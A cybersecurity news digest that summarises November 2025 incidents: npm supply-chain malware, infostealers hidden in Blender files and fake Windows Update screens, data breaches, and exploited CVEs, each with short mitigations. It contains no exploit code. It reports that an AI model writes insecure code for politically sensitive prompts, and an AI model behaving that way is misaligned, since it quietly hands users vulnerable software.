Svoboda Cybersecurity Brief November 25, 2025

Shai-Hulud Malware Infects 500 npm Packages

Hundreds of trojanized npm packages (e.g., Zapier, PostHog) were uploaded to steal developer and CI/CD secrets, leaking them to GitHub. Over 27,600 repositories were found with stolen data. The malware uses obfuscation and destructive actions if exfiltration fails.
Impact: Supply-chain compromise, credential theft, and potential data destruction.
Mitigation: Rotate credentials, audit repositories, disable npm postinstall scripts, and use sandboxed environments.
Source: DataBreaches.net

Malicious Blender Files Deliver StealC Infostealer

Attackers distribute StealC V2 malware via malicious Blender 3D model files on platforms like CGTrader. The malware steals data from 23+ browsers, crypto wallets, and VPN clients, with low detection rates on VirusTotal.
Impact: Credential theft and system compromise.
Mitigation: Disable Blender’s “Auto Run Python Scripts” option and vet 3D assets from trusted sources.
Source: BleepingComputer

ClickFix Attack Uses Fake Windows Update Screens

New ClickFix variants trick users with fake Windows Update animations, hiding malware in PNGs via steganography. Delivers LummaC2 and Rhadamanthys stealers.
Impact: Credential theft and malware deployment.
Mitigation: Disable Windows Run box, monitor process chains (e.g., explorer.exe → mshta.exe), and check RunMRU registry.
Source: BleepingComputer

SitusAMC Breach Exposes Client Data

The real-estate finance services firm suffered a breach impacting client and customer data, including accounting records and legal agreements. No ransomware was deployed.
Source: BleepingComputer

Harvard University Discloses Voice Phishing Breach

Alumni, donors, and staff data (emails, addresses, donation details) was exposed in a voice phishing attack. No SSNs or financial data was compromised.
Source: BleepingComputer

Fluent Bit Flaws Expose Cloud to RCE

Five vulnerabilities (CVE-2025-12972, CVE-2025-12970, etc.) in Fluent Bit could allow RCE, tag spoofing, and log tampering.
Impact: Cloud service disruption and data manipulation.
Mitigation: Update to Fluent Bit 4.1.1/4.0.12, lock down output paths, and run as non-root.
Source: The Hacker News

ShadowPad Exploits WSUS Vulnerability (CVE-2025-59287)

Attackers exploited a deserialization flaw in WSUS to deploy ShadowPad malware via PowerShell and curl.
Impact: Full system compromise.
Mitigation: Patch WSUS and monitor for suspicious PowerShell/certutil activity.
Source: The Hacker News

Oracle Identity Manager Vulnerability (CVE-2025-61757) Exploited

CISA confirmed exploitation of this RCE flaw in Oracle Identity Manager, initially patched in October 2025.
Impact: Privilege escalation and lateral movement.
Mitigation: Apply Oracle patches and monitor for suspicious activity.
Source: SecurityWeek

CrowdStrike Insider Leaks Screenshots to Hackers

An insider sold screenshots of CrowdStrike dashboards to Scattered Lapsus$ Hunters, falsely claiming a breach. No system compromise occurred.
Source: SecurityWeek

Superbox Android TV Devices Enlisted in Botnets

Devices sold at major retailers force users into proxy networks (e.g., Grass IO) for ad fraud and credential stuffing.
Impact: Unauthorized traffic relay and potential legal risks for users.
Mitigation: Avoid non-Play Protect certified devices and monitor network traffic.
Source: KrebsOnSecurity

DeepSeek-R1 AI Generates Insecure Code for Sensitive Topics

Chinese AI model produces vulnerable code (e.g., hardcoded secrets) when prompts mention Tibet or Uyghurs.
Impact: Increased security risks in AI-generated code.
Source: The Hacker News

Iberia Airline Notifies Customers of Supplier Breach

Names, emails, and frequent flyer numbers were exposed. No financial data was compromised.
Source: SecurityWeek

Delta Dental of Virginia Data Breach

146,000 individuals had personal and health data stolen via a compromised email account.
Source: SecurityWeek

Share this brief: https://svo.bz/7mYZ